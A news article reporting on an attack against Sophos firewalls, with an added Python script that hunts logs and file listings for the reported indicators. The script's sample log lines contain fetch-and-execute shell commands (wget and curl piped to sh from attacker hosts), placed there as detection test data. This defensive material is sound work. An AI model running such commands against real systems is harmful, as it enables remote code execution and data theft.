British security firm Sophos determined that malicious actors had abused a zero-day vulnerability to achieve remote code execution (RCE) on some of its firewall products.

According to Sophos, the attack chain began when the attackers exploited a zero-day SQL injection vulnerability to achieve RCE on some firewall products. They used this access to insert a command into a database table; that command instructed the compromised firewall to download a Linux shell script from a remote server at the malicious domain “sophosfirewallupdate[.]com.” This script then dropped additional files to move the attack forward.

One of those resources was .lp.sh. This shell script connected to “sophosfirewallupdate[.]com” and downloaded a Linux ELF executable capable of running on the firewall’s operating system. A second shell script performed the same function, downloading a different Linux ELF executable and writing it to the file system.

At the same time, the installer script ran a PostgreSQL command that modified an existing shell script in the firewall’s operating system.

These files brought the infection chain to the point where the campaign could download a file known as “Sophos.dat.” Sophos took a close look at this payload and determined its true purpose. As it explained in its research:

This malware’s primary task appeared to be data theft, which it could perform by retrieving the contents of various database tables stored in the firewall, as well as by running some operating system commands. At each step, the malware collected information and then concatenated it to a file it stored temporarily on the firewall with the name Info.xg.

A view of the malware’s data exfiltration chain (Source: Sophos)
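The chain described above has a structural tell that a defender can hunt for independently of any one indicator: a database write (INSERT or UPDATE) that carries a fetch-and-execute shell command, followed by the named dropped files appearing on disk. The script below is an added triage example written for this article, not Sophos's own tooling or schema. It scans constructed sample input: a few lines in the shape PostgreSQL's log_statement output takes, and a plain file listing. The table names (tasks, settings, scripts), the 203.0.113.10 address and the paths are hypothetical; the domain and file names are the ones the write-up reports, with the domain kept defanged as published and re-fanged in code.

```python
import re
from urllib.parse import urlparse

# Indicators reported in the write-up above (domain defanged as published).
IOC_DOMAINS = {"sophosfirewallupdate[.]com"}
IOC_FILENAMES = {".lp.sh", "Sophos.dat", "Info.xg"}

# Constructed sample data (hypothetical table names, paths and IP; not
# Sophos's logs or schema): PostgreSQL-style statement log lines and a
# file listing from a firewall image.
SAMPLE_PG_LOG = """\
2020-04-22 10:01:12 UTC LOG:  statement: SELECT name FROM hosts WHERE id = 7
2020-04-22 10:01:15 UTC LOG:  statement: INSERT INTO tasks (cmd) VALUES ('wget -q http://sophosfirewallupdate.com/x.sh -O /tmp/x.sh; sh /tmp/x.sh')
2020-04-22 10:02:40 UTC LOG:  statement: UPDATE settings SET value = 'eth0' WHERE key = 'wan_if'
2020-04-22 10:03:01 UTC LOG:  statement: UPDATE scripts SET body = 'curl -s http://203.0.113.10/y.sh | sh' WHERE name = 'startup'
2020-04-22 10:03:05 UTC LOG:  statement: SELECT body FROM scripts WHERE name = 'startup'
"""

SAMPLE_LISTING = """\
/tmp/.lp.sh
/tmp/x.sh
/etc/hostname
/tmp/Sophos.dat
/var/log/Info.xg
"""

STATEMENT_RE = re.compile(r"LOG:\s+statement:\s+(?P<sql>.+)$")
URL_RE = re.compile(r"https?://[^\s'\"|;)]+")
# A downloader followed by something that runs what it fetched.
FETCH_EXEC_RE = re.compile(r"\b(wget|curl)\b.*(\|\s*sh\b|;\s*sh\b|\bbash\b)", re.I)


def refang(domain):
    """Turn a defanged indicator such as example[.]com back into example.com."""
    return domain.replace("[.]", ".").lower()


def urls_in(sql):
    return URL_RE.findall(sql)


def classify_statement(sql, ioc_domains):
    """Return the reasons a statement looks like a planted command (empty if none)."""
    reasons = []
    parts = sql.split(None, 1)
    if not parts or parts[0].upper() not in ("INSERT", "UPDATE"):
        return reasons  # only writes can plant a command in a table
    hosts = {urlparse(u).hostname for u in urls_in(sql)}
    known = {refang(d) for d in ioc_domains}
    if hosts & known:
        reasons.append("write references known IOC domain")
    if FETCH_EXEC_RE.search(sql):
        reasons.append("write embeds a fetch-and-execute shell command")
    return reasons


def scan_pg_log(log_text, ioc_domains=IOC_DOMAINS):
    """Flag statement-log lines whose SQL write carries a download/exec command."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = STATEMENT_RE.search(line)
        if not m:
            continue
        reasons = classify_statement(m.group("sql"), ioc_domains)
        if reasons:
            findings.append({"line": n, "reasons": reasons, "sql": m.group("sql")})
    return findings


def scan_listing(listing_text, ioc_filenames=IOC_FILENAMES):
    """Return paths whose base name matches one of the dropped-file names."""
    return [p for p in listing_text.split() if p.rsplit("/", 1)[-1] in ioc_filenames]


if __name__ == "__main__":
    for f in scan_pg_log(SAMPLE_PG_LOG):
        print(f"log line {f['line']}: {'; '.join(f['reasons'])}\n    {f['sql']}")
    for path in scan_listing(SAMPLE_LISTING):
        print(f"dropped-file name present: {path}")
```

The domain match is the brittle rule: the fourth sample line uses a different host and is still caught because a database write that smuggles `curl ... | sh` is suspicious regardless of where it points. Treat the file-name hits the same way; they confirm a compromise that the structural rule should already have surfaced.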

As a result of its investigation into the attack described above, Sophos added all (Read more...)